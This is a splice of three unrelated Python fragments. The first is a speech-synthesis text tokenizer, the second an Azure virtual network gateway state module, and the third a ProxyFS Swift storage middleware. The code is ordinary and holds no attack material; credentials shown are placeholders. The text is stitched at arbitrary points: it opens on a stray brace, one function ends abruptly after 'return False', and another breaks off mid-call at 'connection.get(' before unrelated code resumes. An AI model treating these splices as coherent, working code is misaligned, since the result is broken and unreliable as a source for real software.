}
parts = list(
filter(
None,
settings.begin_punctuations_pattern.split(
word_text, maxsplit=1
),
)
)
# Punctuations at the end of the word
end_punctuations: typing.List[str] = []
if settings.end_punctuations_pattern is not None:
# Split into rest of word and end punctuation
parts = list(
filter(
None, settings.end_punctuations_pattern.split(word_text, maxsplit=1)
)
)
while word_text and (len(parts) == 2):
word_text, punct_text = parts
has_punctuation = True
end_punctuations.append(punct_text)
parts = list(
filter(
None,
settings.end_punctuations_pattern.split(word_text, maxsplit=1),
)
)
if not has_punctuation:
# Leave word as-is
return
if settings.keep_whitespace and (not end_punctuations):
# Preserve trailing whitespace
word_text = word_text + last_ws
word_text_norm = settings.normalize_whitespace(word_text)
if word_text:
yield WordNode, {
"text": word_text_norm,
"text_with_ws": word_text,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
"in_lexicon": self._is_word_in_lexicon(word_text_norm, settings),
}
last_punct_idx = len(end_punctuations) - 1
for punct_idx, punct_text in enumerate(reversed(end_punctuations)):
if settings.keep_whitespace and (punct_idx == last_punct_idx):
# Preserve trailing whitespace
punct_text += last_ws
yield PunctuationWordNode, {
"text": punct_text.strip(),
"text_with_ws": punct_text,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
}
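# Illustrative outcome of the splitting above (assuming typical begin/end
# punctuation patterns): '"hello," ' would yield PunctuationWordNode('"'),
# WordNode('hello') and PunctuationWordNode(','), with the original leading
# and trailing whitespace preserved on the first and last pieces.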
def _split_major_breaks(self, graph: GraphType, node: Node):
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon:
# Don't interpret words that are spoken for
return
settings = self.get_settings(word.lang)
if settings.major_breaks_pattern is None:
# No pattern set for this language
return
parts = settings.major_breaks_pattern.split(word.text_with_ws)
if len(parts) < 2:
return
word_part = parts[0]
break_part = parts[1]
if word_part.strip():
# Only yield word if there's anything but whitespace
word_part_norm = settings.normalize_whitespace(word_part)
yield WordNode, {
"text": word_part_norm,
"text_with_ws": word_part,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
"in_lexicon": self._is_word_in_lexicon(word_part_norm, settings),
}
else:
# Keep leading whitespace
break_part = word_part + break_part
yield BreakWordNode, {
"break_type": BreakType.MAJOR,
"text": settings.normalize_whitespace(break_part),
"text_with_ws": break_part,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
}
def _split_minor_breaks(self, graph: GraphType, node: Node):
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon:
# Don't interpret words that are spoken for
return
settings = self.get_settings(word.lang)
if settings.minor_breaks_pattern is None:
# No pattern set for this language
return
parts = settings.minor_breaks_pattern.split(word.text_with_ws)
if len(parts) < 2:
return
word_part = parts[0]
if word_part.strip():
# Only yield word if there's anything but whitespace
word_part_norm = settings.normalize_whitespace(word_part)
yield WordNode, {
"text": word_part_norm,
"text_with_ws": word_part,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
"in_lexicon": self._is_word_in_lexicon(word_part_norm, settings),
}
break_part = parts[1]
yield BreakWordNode, {
"break_type": BreakType.MINOR,
"text": settings.normalize_whitespace(break_part),
"text_with_ws": break_part,
"implicit": True,
"lang": word.lang,
"voice": word.voice,
}
def _find_parent(self, graph, node, *classes):
"""Tries to find a node whose type is in classes in the tree above node"""
parents = []
for parent_node in graph.predecessors(node.node):
parent = graph.nodes[parent_node][DATA_PROP]
if isinstance(parent, classes):
return parent
parents.append(parent)
for parent in parents:
match = self._find_parent(graph, parent, classes)
if match is not None:
return match
return None
# pylint: disable=no-self-use
def _phonemes_for_break(
self,
break_type: typing.Union[str, BreakType],
lang: typing.Optional[str] = None,
) -> typing.Optional[PHONEMES_TYPE]:
if break_type == BreakType.MAJOR:
return [IPA.BREAK_MAJOR.value]
if break_type == BreakType.MINOR:
return [IPA.BREAK_MINOR.value]
return None
# -------------------------------------------------------------------------
def _pipeline_tokenize(
self,
graph,
parent_node,
text,
word_phonemes: typing.Optional[typing.List[typing.List[str]]] = None,
scope_kwargs=None,
in_inline_lexicon: typing.Optional[
typing.Callable[[str, typing.Optional[str]], bool]
] = None,
):
"""Splits text into word nodes"""
if scope_kwargs is None:
scope_kwargs = {}
lang = self.default_lang
if scope_kwargs is not None:
lang = scope_kwargs.get("lang", lang)
settings = self.get_settings(lang)
assert settings is not None, f"No settings for {lang}"
if settings.pre_process_text is not None:
# Pre-process text
text = settings.pre_process_text(text)
# Split into separate words (preserving whitespace).
for word_text in settings.split_words(text):
word_text_norm = settings.normalize_whitespace(word_text)
if not word_text_norm:
continue
if not settings.keep_whitespace:
word_text = word_text_norm
word_kwargs = scope_kwargs
if word_phonemes:
word_kwargs = {**scope_kwargs, "phonemes": word_phonemes.pop()}
# Determine if word is in a lexicon.
# If so, it will not be interpreted as an initialism, split apart, etc.
in_lexicon: typing.Optional[bool] = None
if in_inline_lexicon is not None:
# Check inline <lexicon> first
in_lexicon = in_inline_lexicon(
word_text_norm, scope_kwargs.get("word_role")
)
if not in_lexicon:
# Check main language lexicon
in_lexicon = self._is_word_in_lexicon(word_text_norm, settings)
word_node = WordNode(
node=len(graph),
text=word_text_norm,
text_with_ws=word_text,
implicit=True,
in_lexicon=in_lexicon,
**word_kwargs,
)
graph.add_node(word_node.node, data=word_node)
graph.add_edge(parent_node.node, word_node.node)
# -------------------------------------------------------------------------
# Pipeline Splits
# -------------------------------------------------------------------------
def _split_spell_out(self, graph: GraphType, node: Node):
"""Expand spell-out (a-1 -> a dash one)"""
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as != InterpretAs.SPELL_OUT:
return
settings = self.get_settings(word.lang)
# Preserve whitespace
first_ws, last_ws = settings.get_whitespace(word.text_with_ws)
last_char_idx = len(word.text) - 1
for i, c in enumerate(word.text):
# Look up in settings first ("." -> "dot")
word_text = settings.spell_out_words.get(c)
role = WordRole.DEFAULT
if word_text is None:
if c.isalpha():
# Assume this is a letter
word_text = c
role = WordRole.LETTER
else:
# Leave as is (expand later in pipeline if digit, etc.)
word_text = c
if not word_text:
continue
if settings.keep_whitespace:
if i == 0:
word_text = first_ws + word_text
if i == last_char_idx:
word_text += last_ws
else:
word_text += settings.join_str
yield WordNode, {
"text": settings.normalize_whitespace(word_text),
"text_with_ws": word_text,
"implicit": True,
"lang": word.lang,
"role": role,
}
def _split_replacements(self, graph: GraphType, node: Node):
"""Do regex replacements on word text"""
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon:
# Don't interpret words that are spoken for
return
settings = self.get_settings(word.lang)
if not settings.replacements:
# No replacements
return
matched = False
new_text = word.text_with_ws
for pattern, template in settings.replacements:
assert isinstance(pattern, REGEX_PATTERN)
new_text, num_subs = pattern.subn(template, new_text)
if num_subs > 0:
matched = True
if matched:
# Tokenize new text (whitespace is preserved by regex)
for part_text in settings.split_words(new_text):
part_text_norm = settings.normalize_whitespace(part_text)
if not settings.keep_whitespace:
part_text = part_text_norm
if not part_text_norm:
# Ignore empty words
continue
yield WordNode, {
"text": part_text_norm,
"text_with_ws": part_text,
"implicit": True,
"lang": word.lang,
"in_lexicon": self._is_word_in_lexicon(part_text_norm, settings),
}
def _split_abbreviations(self, graph: GraphType, node: Node):
"""Expand abbreviations"""
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon:
# Don't interpret words that are spoken for
return
settings = self.get_settings(word.lang)
if not settings.abbreviations:
# No abbreviations
return
new_text: typing.Optional[str] = None
for pattern, template in settings.abbreviations.items():
assert isinstance(pattern, REGEX_PATTERN), pattern
match = pattern.match(word.text_with_ws)
if match is not None:
new_text = match.expand(template)
break
if new_text is not None:
# Tokenize new text (whitespace should be preserved by regex)
for part_text in settings.split_words(new_text):
part_text_norm = settings.normalize_whitespace(part_text)
if not part_text_norm:
continue
if not settings.keep_whitespace:
part_text = part_text_norm
yield WordNode, {
"text": part_text_norm,
"text_with_ws": part_text,
"implicit": True,
"lang": word.lang,
"in_lexicon": self._is_word_in_lexicon(part_text_norm, settings),
}
def _split_initialism(self, graph: GraphType, node: Node):
"""Split apart ABC or A.B.C."""
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon or (len(word.text) < 2):
# Don't interpret words that are spoken for or are too short
return
settings = self.get_settings(word.lang)
if (settings.is_initialism is None) or (settings.split_initialism is None):
# Can't do anything without these functions
return
if not settings.is_initialism(word.text):
# Not an initialism
return
first_ws, last_ws = settings.get_whitespace(word.text_with_ws)
parts = settings.split_initialism(word.text)
last_part_idx = len(parts) - 1
# Split according to language-specific function
for part_idx, part_text in enumerate(parts):
part_text_norm = settings.normalize_whitespace(part_text)
if not part_text_norm:
continue
if settings.keep_whitespace:
if part_idx == 0:
part_text = first_ws + part_text
if 0 <= part_idx < last_part_idx:
part_text += settings.join_str
elif part_idx == last_part_idx:
part_text += last_ws
yield WordNode, {
"text": part_text_norm,
"text_with_ws": part_text,
"implicit": True,
"lang": word.lang,
"role": WordRole.LETTER,
}
def _split_ignore_non_words(self, graph: GraphType, node: Node):
"""Mark non-words as ignored"""
if not isinstance(node, WordNode):
return
word = typing.cast(WordNode, node)
if word.interpret_as or word.in_lexicon:
# Don't interpret words that are spoken for
return
settings = self.get_settings(word.lang)
if settings.is_non_word is None:
# No function for this language
return
if settings.is_non_word(word.text):
yield (IgnoreNode, {})
# -------------------------------------------------------------------------
# Pipeline Transformations
# -------------------------------------------------------------------------
def _transform_number(self, graph: GraphType, node: Node) -> bool:
if not isinstance(node, WordNode):
return False
word = typing.cast(WordNode, node)
if (not word.is_maybe_number) or (
word.interpret_as and (word.interpret_as != InterpretAs.NUMBER)
):
return False
# -*- coding: utf-8 -*-
"""
Azure Resource Manager (ARM) Virtual Network Gateway State Module
.. versionadded:: 1.0.0
:maintainer: <<EMAIL>>
:configuration: This module requires Azure Resource Manager credentials to be passed via acct. Note that the
authentication parameters are case sensitive.
Required provider parameters:
if using username and password:
* ``subscription_id``
* ``username``
* ``password``
if using a service principal:
* ``subscription_id``
* ``tenant``
* ``client_id``
* ``secret``
Optional provider parameters:
**cloud_environment**: Used to point the cloud driver to different API endpoints, such as Azure GovCloud. Possible values:
* ``AZURE_PUBLIC_CLOUD`` (default)
* ``AZURE_CHINA_CLOUD``
* ``AZURE_US_GOV_CLOUD``
* ``AZURE_GERMAN_CLOUD``
Example acct setup for Azure Resource Manager authentication:
.. code-block:: yaml
azurerm:
default:
subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617
tenant: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF
client_id: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF
secret: XXXXXXXXXXXXXXXXXXXXXXXX
cloud_environment: AZURE_PUBLIC_CLOUD
user_pass_auth:
subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617
username: fletch
password: <PASSWORD>
The authentication parameters can also be passed as a dictionary of keyword arguments to the ``connection_auth``
parameter of each state, but this is not preferred and could be deprecated in the future.
Example states using Azure Resource Manager authentication:
.. code-block:: jinja
Ensure virtual network exists:
azurerm.network.virtual_network.present:
- name: my_vnet
- resource_group: my_rg
- address_prefixes:
- '10.0.0.0/8'
- '192.168.0.0/16'
- dns_servers:
- '8.8.8.8'
- tags:
how_awesome: very
contact_name: <NAME>
- connection_auth: {{ profile }}
Ensure virtual network is absent:
azurerm.network.virtual_network.absent:
- name: other_vnet
- resource_group: my_rg
- connection_auth: {{ profile }}
"""
# Python libs
from __future__ import absolute_import
from dict_tools import differ
import logging
import re
log = logging.getLogger(__name__)
TREQ = {
"present": {
"require": [
"states.azurerm.resource.group.present",
"states.azurerm.network.virtual_network.present",
]
},
"connection_present": {
"require": [
"states.azurerm.resource.group.present",
"states.azurerm.network.virtual_network.present",
"states.azurerm.network.virtual_network_gateway.present",
]
},
}
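# NOTE: TREQ appears to declare transparent requisites, i.e. the resource
# group and virtual network (and, for connections, the gateway) states are
# implicitly required before the states in this module run. This reading is
# an assumption based on the structure above rather than documented behaviour.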
async def connection_present(
hub,
ctx,
name,
resource_group,
virtual_network_gateway,
connection_type,
virtual_network_gateway2=None,
local_network_gateway2=None,
peer=None,
connection_protocol=None,
shared_key=None,
enable_bgp=None,
ipsec_policies=None,
use_policy_based_traffic_selectors=None,
routing_weight=None,
express_route_gateway_bypass=None,
authorization_key=None,
tags=None,
connection_auth=None,
**kwargs,
):
"""
.. versionadded:: 1.0.0
Ensure a virtual network gateway connection exists.
:param name:
The name of the virtual network gateway connection.
:param resource_group:
The name of the resource group associated with the virtual network gateway connection.
:param virtual_network_gateway:
The name of the virtual network gateway that will be the first endpoint of the connection.
The virtual_network_gateway is immutable once set.
:param connection_type:
Gateway connection type. Possible values include: 'IPsec', 'Vnet2Vnet', and 'ExpressRoute'.
The connection_type is immutable once set.
:param virtual_network_gateway2:
The valid Resource ID representing a VirtualNetworkGateway Object that will be used as the second endpoint
for the connection. Required for a connection_type of 'Vnet2Vnet'. This is immutable once set.
:param local_network_gateway2:
The valid Resource ID representing a LocalNetworkGateway Object that will be used as the second endpoint
for the connection. Required for a connection_type of 'IPSec'. This is immutable once set.
:param peer:
The valid Resource ID representing a ExpressRouteCircuit Object that will be used as the second endpoint
for the connection. Required for a connection_type of 'ExpressRoute'. This is immutable once set.
:param connection_protocol:
Connection protocol used for this connection. Possible values include: 'IKEv2', 'IKEv1'.
:param shared_key:
The shared key for the connection. Required for a connection_type of 'IPSec' or 'Vnet2Vnet'.
Defaults to a randomly generated key.
:param enable_bgp:
Whether BGP is enabled for this virtual network gateway connection or not. This is a bool value that defaults
to False. Both endpoints of the connection must have BGP enabled and may not have the same ASN values. Cannot
be enabled while use_policy_based_traffic_selectors is enabled.
:param ipsec_policies:
The IPSec Policies to be considered by this connection. Must be passed as a list containing a single IPSec
Policy dictionary that contains the following parameters:
- ``sa_life_time_seconds``: The IPSec Security Association (also called Quick Mode or Phase 2 SA)
lifetime in seconds for P2S client. Must be between 300 - 172799 seconds.
- ``sa_data_size_kilobytes``: The IPSec Security Association (also called Quick Mode or Phase 2 SA) payload
size in KB for P2S client. Must be between 1024 - 2147483647 kilobytes.
- ``ipsec_encryption``: The IPSec encryption algorithm (IKE phase 1). Possible values include: 'None',
'DES', 'DES3', 'AES128', 'AES192', 'AES256', 'GCMAES128', 'GCMAES192', 'GCMAES256'
- ``ipsec_integrity``: The IPSec integrity algorithm (IKE phase 1). Possible values include:
'MD5', 'SHA1', 'SHA256', 'GCMAES128', 'GCMAES192', 'GCMAES256'
- ``ike_encryption``: The IKE encryption algorithm (IKE phase 2). Possible values include:
'DES', 'DES3', 'AES128', 'AES192', 'AES256', 'GCMAES256', 'GCMAES128'
- ``ike_integrity``: The IKE integrity algorithm (IKE phase 2). Possible values include:
'MD5', 'SHA1', 'SHA256', 'SHA384', 'GCMAES256', 'GCMAES128'
- ``dh_group``: The DH Group used in IKE Phase 1 for initial SA. Possible values include:
'None', 'DHGroup1', 'DHGroup2', 'DHGroup14', 'DHGroup2048', 'ECP256', 'ECP384', 'DHGroup24'
- ``pfs_group``: The Pfs Group used in IKE Phase 2 for new child SA. Possible values include:
'None', 'PFS1', 'PFS2', 'PFS2048', 'ECP256', 'ECP384', 'PFS24', 'PFS14', 'PFSMM'
:param use_policy_based_traffic_selectors:
Enable policy-based traffic selectors for a connection. Can only be enabled for a connection of type 'IPSec'.
Cannot be enabled at the same time as BGP. Requires that the IPSec policies are defined. This is a bool value.
:param routing_weight:
The routing weight. This is an integer value.
:param express_route_gateway_bypass:
Bypass ExpressRoute Gateway for data forwarding. This is a bool value.
:param authorization_key:
The authorizationKey. This is a string value.
:param tags:
A dictionary of strings can be passed as tag metadata to the virtual network gateway connection object.
:param connection_auth:
A dict with subscription and authentication parameters to be used in connecting to the
Azure Resource Manager API.
Example usage:
.. code-block:: yaml
Ensure virtual network gateway Vnet2Vnet connection exists:
azurerm.network.virtual_network_gateway.connection_present:
- name: connection1
- resource_group: group1
- virtual_network_gateway: Resource ID for gateway1
- connection_type: 'Vnet2Vnet'
- virtual_network_gateway2: Resource ID for gateway2
- enable_bgp: False
- shared_key: 'key'
- tags:
contact_name: <NAME>
- connection_auth: {{ profile }}
Ensure virtual network gateway IPSec connection exists:
azurerm.network.virtual_network_gateway.connection_present:
- name: connection1
- resource_group: group1
- virtual_network_gateway: Resource ID for gateway1
- connection_type: 'IPSec'
- local_network_gateway2: Resource ID for gateway2
- enable_bgp: False
- shared_key: 'key'
- use_policy_based_traffic_selectors: True
- ipsec_policies:
- sa_life_time_seconds: 300
sa_data_size_kilobytes: 1024
ipsec_encryption: 'DES'
ipsec_integrity: 'SHA256'
ike_encryption: 'DES'
ike_integrity: 'SHA256'
dh_group: 'None'
pfs_group: 'None'
- tags:
contact_name: <NAME>
- connection_auth: {{ profile }}
"""
ret = {"name": name, "result": False, "comment": "", "changes": {}}
action = "create"
if not isinstance(connection_auth, dict):
if ctx["acct"]:
connection_auth = ctx["acct"]
else:
ret[
"comment"
] = "Connection information must be specified via acct or connection_auth dictionary!"
return ret
connection = await hub.exec.azurerm.network.virtual_network_gateway.connection_get(
ctx, name, resource_group, azurerm_log_level="info", **connection_auth
)
if "error" not in connection:
action = "update"
tag_changes = differ.deep_diff(connection.get("tags", {}), tags or {})
if tag_changes:
ret["changes"]["tags"] = tag_changes
if connection_protocol and connection_protocol != connection.get(
"connection_protocol"
):
ret["changes"]["connection_protocol"] = {
"old": connection.get("connection_protocol"),
"new": connection_protocol,
}
if connection_type == "IPSec":
if ipsec_policies:
if not isinstance(ipsec_policies, list):
ret[
"comment"
] = "ipsec_policies must be provided as a list containing a single dictionary!"
return ret
try:
policy = ipsec_policies[0]
except IndexError:
ret[
"comment"
] = "ipsec_policies must be provided as a list containing a single dictionary!"
return ret
if not isinstance(policy, dict):
ret[
"comment"
] = "ipsec_policies must be provided as a list containing a single dictionary!"
return ret
if len(connection.get("ipsec_policies", [])) == 1:
connection_policy = connection.get("ipsec_policies")[0]
for key in policy.keys():
if policy[key] != connection_policy.get(key):
ret["changes"]["ipsec_policies"] = {
"old": connection.get("ipsec_policies", []),
"new": ipsec_policies,
}
break
else:
ret["changes"]["ipsec_policies"] = {
"old": connection.get("ipsec_policies", []),
"new": ipsec_policies,
}
# Checking boolean parameter
if use_policy_based_traffic_selectors is not None:
if use_policy_based_traffic_selectors != connection.get(
"use_policy_based_traffic_selectors"
):
ret["changes"]["use_policy_based_traffic_selectors"] = {
"old": connection.get("use_policy_based_traffic_selectors"),
"new": use_policy_based_traffic_selectors,
}
if connection_type == "Vnet2Vnet" or connection_type == "IPSec":
# Checking boolean parameter
if enable_bgp is not None and enable_bgp != connection.get("enable_bgp"):
ret["changes"]["enable_bgp"] = {
"old": connection.get("enable_bgp"),
"new": enable_bgp,
}
if shared_key and shared_key != connection.get("shared_key"):
ret["changes"]["shared_key"] = {
"old": connection.get("shared_key"),
"new": shared_key,
}
if connection_type == "ExpressRoute":
if peer and peer != connection.get("peer"):
ret["changes"]["peer"] = {"old": connection.get("peer"), "new": peer}
if authorization_key and authorization_key != connection.get(
"authorization_key"
):
ret["changes"]["authorization_key"] = {
"old": connection.get("authorization_key"),
"new": authorization_key,
}
if routing_weight is not None and routing_weight != connection.get(
"routing_weight"
):
ret["changes"]["routing_weight"] = {
"old": connection.get("routing_weight"),
"new": routing_weight,
}
# Checking boolean parameter
if express_route_gateway_bypass is not None:
if express_route_gateway_bypass != connection.get(
path = urllib_parse.unquote(req.path)
new_metadata = extract_object_metadata_from_headers(req.headers)
try:
head_response = self.rpc_call(ctx, rpc.head_request(path))
raw_old_metadata, mtime, _, _, inode_number, _ = \
rpc.parse_head_response(head_response)
except utils.RpcError as err:
if err.errno in (pfs_errno.NotFoundError, pfs_errno.NotDirError):
return swob.HTTPNotFound(request=req)
else:
raise
# There is no need to call unmung_etags() before the merge and
# mung_etags() after because the merge cannot change the several
# possible ETag headers.
#
# This might be an opportunity to drop an ETAG header that has
# become stale due to num_writes changing, but that does not
# seem important to address.
old_metadata = deserialize_metadata(raw_old_metadata)
merged_metadata = merge_object_metadata(old_metadata, new_metadata)
raw_merged_metadata = serialize_metadata(merged_metadata)
self.rpc_call(ctx, rpc.post_request(
path, raw_old_metadata, raw_merged_metadata))
resp = swob.HTTPAccepted(request=req, body="")
return resp
def get_object(self, ctx):
req = ctx.req
byteranges = req.range.ranges if req.range else ()
try:
object_response = self.rpc_call(ctx, rpc.get_object_request(
urllib_parse.unquote(req.path), byteranges))
except utils.RpcError as err:
if err.errno in (pfs_errno.NotFoundError, pfs_errno.NotDirError):
return swob.HTTPNotFound(request=req)
elif err.errno == pfs_errno.IsDirError:
return swob.HTTPOk(
request=req, body="",
headers={"Content-Type": DIRECTORY_CONTENT_TYPE,
"ETag": EMPTY_OBJECT_ETAG})
else:
# punt to top-level exception handler
raise
(read_plan, raw_metadata, size, mtime_ns,
is_dir, ino, num_writes, lease_id) = \
rpc.parse_get_object_response(object_response)
metadata = deserialize_metadata(raw_metadata)
unmung_etags(metadata, num_writes)
headers = swob.HeaderKeyDict(metadata)
if "Content-Type" not in headers:
headers["Content-Type"] = guess_content_type(req.path, is_dir)
else:
headers['Content-Type'] = headers['Content-Type'].split(
';swift_bytes=')[0]
headers["Accept-Ranges"] = "bytes"
headers["Last-Modified"] = last_modified_from_epoch_ns(
mtime_ns)
headers["X-Timestamp"] = x_timestamp_from_epoch_ns(
mtime_ns)
headers["Etag"] = best_possible_etag(
headers, ctx.account_name, ino, num_writes, is_dir=is_dir)
get_read_plan = req.params.get("get-read-plan", "no")
if get_read_plan == "":
get_read_plan = "yes"
if self.bypass_mode != 'off' and req.environ.get('swift_owner') and \
config_true_value(get_read_plan):
headers.update({
# Flag that pfs_middleware correctly interpreted this request
"X-ProxyFS-Read-Plan": "True",
# Stash the "real" content type...
"X-Object-Content-Type": headers["Content-Type"],
# ... so we can indicate that *this* data is coming out JSON
"Content-Type": "application/json",
# Also include the total object size
# (since the read plan respects Range requests)
"X-Object-Content-Length": size,
})
return swob.HTTPOk(request=req, body=json.dumps(read_plan),
headers=headers)
if size > 0 and read_plan is None:
headers["Content-Range"] = "bytes */%d" % size
return swob.HTTPRequestedRangeNotSatisfiable(
request=req, headers=headers)
# NB: this is a size-0 queue, so it acts as a channel: a put()
# blocks until another greenthread does a get(). This lets us use it
# for (very limited) bidirectional communication.
channel = eventlet.queue.Queue(0)
eventlet.spawn_n(self._keep_lease_alive, ctx, channel, lease_id)
listing_iter = listing_iter_from_read_plan(read_plan)
# Make sure that nobody (like our __call__ method) messes with this
# environment once we've started. Otherwise, the auth callback may
# reappear, causing log-segment GET requests to fail. This may be
# seen with container ACLs; since the underlying container name
# differs from the user-presented one, without copying the
# environment, all object GET requests for objects in a public
# container would fail.
copied_req = swob.Request(req.environ.copy())
# Ideally we'd wrap seg_iter instead, but swob.Response relies on
# its app_iter supporting certain methods for conditional responses
# to work, and forwarding all those methods through the wrapper is
# prone to failure whenever a new method is added.
#
# Wrapping the listing iterator is just as good. After
# SegmentedIterable exhausts it, we can safely release the lease.
def done_with_object_get():
channel.put("you can stop now")
# It's not technically necessary for us to wait for the other
# greenthread here; we could use one-way notification. However,
# doing things this way lets us ensure that, once this function
# returns, there are no more background actions taken by the
# greenthread. This makes testing a lot easier; we can call the
# middleware, let it return, and then assert things. Were we to
# use a fire-and-forget style, we'd never be sure when all the
# RPCs had been called, and the tests would end up flaky.
channel.get()
wrapped_listing_iter = iterator_posthook(
listing_iter, done_with_object_get)
seg_iter = swift_code.SegmentedIterable(
copied_req, self.zero_filler_app, wrapped_listing_iter,
self.max_get_time,
self.logger, 'PFS', 'PFS',
name=req.path)
resp = swob.HTTPOk(app_iter=seg_iter, conditional_response=True,
request=req,
headers=headers,
content_length=size)
# Support conditional if-match/if-none-match requests for SLOs
resp._conditional_etag = swift_code.resolve_etag_is_at_header(
req, resp.headers)
return resp
def _keep_lease_alive(self, ctx, channel, lease_id):
keep_going = [True]
lease_error = [False]
def renew():
if lease_error[0]:
return
try:
self.rpc_call(ctx, rpc.renew_lease_request(lease_id))
except (utils.RpcError, utils.RpcTimeout):
# If there's an error renewing the lease, stop pestering
# proxyfsd about it. We'll keep serving the object
# anyway, and we'll just hope no log segments vanish
# while we do it.
keep_going[0] = False
lease_error[0] = True
# It could have been a while since this greenthread was created.
# Let's renew first just to be sure.
renew()
while keep_going[0]:
try:
channel.get(block=True, timeout=LEASE_RENEWAL_INTERVAL)
# When we get a message here, we should stop.
keep_going[0] = False
except eventlet.queue.Empty:
# Nobody told us we're done, so renew the lease and loop
# around again.
renew()
if not lease_error[0]:
# Tell proxyfsd that we're done with the lease, but only if
# there were no errors keeping it renewed.
self.rpc_call(ctx, rpc.release_lease_request(lease_id))
channel.put("alright, it's done")
def delete_object(self, ctx):
try:
self.rpc_call(ctx, rpc.delete_request(
urllib_parse.unquote(ctx.req.path)))
except utils.RpcError as err:
if err.errno in (pfs_errno.NotFoundError, pfs_errno.NotDirError):
return swob.HTTPNotFound(request=ctx.req)
elif err.errno == pfs_errno.NotEmptyError:
return swob.HTTPConflict(request=ctx.req)
else:
raise
return swob.HTTPNoContent(request=ctx.req)
def head_object(self, ctx):
req = ctx.req
head_request = rpc.head_request(urllib_parse.unquote(req.path))
try:
head_response = self.rpc_call(ctx, head_request)
except utils.RpcError as err:
if err.errno in (pfs_errno.NotFoundError, pfs_errno.NotDirError):
return swob.HTTPNotFound(request=req)
else:
raise
raw_md, last_modified_ns, file_size, is_dir, ino, num_writes = \
rpc.parse_head_response(head_response)
metadata = deserialize_metadata(raw_md)
unmung_etags(metadata, num_writes)
headers = swob.HeaderKeyDict(metadata)
if "Content-Type" not in headers:
headers["Content-Type"] = guess_content_type(req.path, is_dir)
else:
headers['Content-Type'] = headers['Content-Type'].split(
';swift_bytes=')[0]
headers["Content-Length"] = file_size
headers["ETag"] = best_possible_etag(
headers, ctx.account_name, ino, num_writes, is_dir=is_dir)
headers["Last-Modified"] = last_modified_from_epoch_ns(
last_modified_ns)
headers["X-Timestamp"] = x_timestamp_from_epoch_ns(
last_modified_ns)
resp = swob.HTTPOk(request=req, headers=headers,
conditional_response=True)
# Support conditional if-match/if-none-match requests for SLOs
resp._conditional_etag = swift_code.resolve_etag_is_at_header(
req, resp.headers)
return resp
def coalesce_object(self, ctx, auth_cb):
# extract and verify the object list for the new object
req = ctx.req
object_path = urllib_parse.unquote(req.path)
probably_json = req.environ['wsgi.input'].read(
self.max_coalesce_request_size + 1)
if len(probably_json) > self.max_coalesce_request_size:
return swob.HTTPRequestEntityTooLarge(request=req)
try:
decoded_json = json.loads(probably_json)
except ValueError:
return swob.HTTPBadRequest(request=req, body="Malformed JSON")
if "elements" not in decoded_json:
return swob.HTTPBadRequest(request=req, body="Malformed JSON")
if not isinstance(decoded_json, dict):
return swob.HTTPBadRequest(request=req, body="Malformed JSON")
if not isinstance(decoded_json["elements"], list):
return swob.HTTPBadRequest(request=req, body="Malformed JSON")
if len(decoded_json["elements"]) > self.max_coalesce:
return swob.HTTPRequestEntityTooLarge(request=req)
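# Expected request body shape, as implied by the checks above (illustrative):
# {"elements": ["container/segment-obj-1", "container/segment-obj-2", ...]}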
authed_containers = set()
ctx.req.environ.setdefault('swift.infocache', {})
for elem in decoded_json["elements"]:
if not isinstance(elem, six.string_types):
return swob.HTTPBadRequest(request=req, body="Malformed JSON")
normalized_elem = elem
if normalized_elem.startswith('/'):
normalized_elem = normalized_elem[1:]
if any(p in ('', '.', '..') for p in normalized_elem.split('/')):
return swob.HTTPBadRequest(request=req,
body="Bad element path: %s" % elem)
elem_container = normalized_elem.split('/', 1)[0]
elem_container_path = '/v1/%s/%s' % (
ctx.account_name, elem_container)
if auth_cb and elem_container_path not in authed_containers:
# Gotta check auth for all of the segments, too
bimodal_checker = ctx.req.environ[utils.ENV_BIMODAL_CHECKER]
acl_env = ctx.req.environ.copy()
acl_env['PATH_INFO'] = swift_code.text_to_wsgi(
elem_container_path)
container_info = get_container_info(
acl_env, bimodal_checker,
swift_source="PFS")
for acl in ('read_acl', 'write_acl'):
req.acl = container_info[acl]
denial_response = auth_cb(ctx.req)
if denial_response:
return denial_response
authed_containers.add(elem_container_path)
# proxyfs treats the number of objects as the number of writes
num_writes = len(decoded_json["elements"])
# validate the metadata for the new object (further munging
# of ETags will be done later)
err = constraints.check_metadata(req, 'object')
if err:
return err
# retrieve the ETag value in the request, or None
req_etag = req.headers.get('ETag')
# strip out user supplied and other unwanted headers
obj_metadata = extract_object_metadata_from_headers(req.headers)
# strip out headers that apply only to SLO objects
unwanted_headers = ['X-Static-Large-Object']
for header in obj_metadata.keys():
if header.startswith("X-Object-Sysmeta-Slo-"):
unwanted_headers.append(header)
for header in unwanted_headers:
if header in obj_metadata:
del obj_metadata[header]
# Now that we know the number of writes (really number of objects) we
# can mung the sundry ETag headers.
mung_etags(obj_metadata, req_etag, num_writes)
raw_obj_metadata = serialize_metadata(obj_metadata)
# now get proxyfs to coalesce the objects and set initial headers
try:
coalesce_response = self.rpc_call(
ctx, rpc.coalesce_object_request(
object_path, decoded_json["elements"], raw_obj_metadata))
except utils.RpcError as err:
if err.errno == pfs_errno.NotFoundError:
return swob.HTTPNotFound(
request=req,
headers={"Content-Type": "text/plain"},
body="One or more path elements not found")
elif err.errno in (pfs_errno.NotDirError, pfs_errno.IsDirError):
return swob.HTTPConflict(
request=req,
headers={"Content-Type": "text/plain"},
body="Elements must be plain files, not directories")
elif err.errno == pfs_errno.TooManyLinksError:
return swob.HTTPConflict(
request=req,
headers={"Content-Type": "text/plain"},
body=("One or more path elements has multiple links; "
"only singly-linked files can be combined"))
else:
raise
